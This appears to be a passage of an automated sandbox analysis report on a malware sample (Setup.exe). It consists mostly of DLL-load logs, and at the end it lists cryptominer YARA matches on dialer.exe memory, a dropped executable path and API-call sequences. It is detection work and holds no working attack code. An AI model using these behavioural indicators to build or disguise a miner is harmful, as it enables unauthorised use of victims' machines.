          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: dialer.exe PID: 6444, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: classification engineClassification label: mal100.spyw.evad.mine.winZIP@108/24@1/6
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,41_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,41_2_00000001400019C4
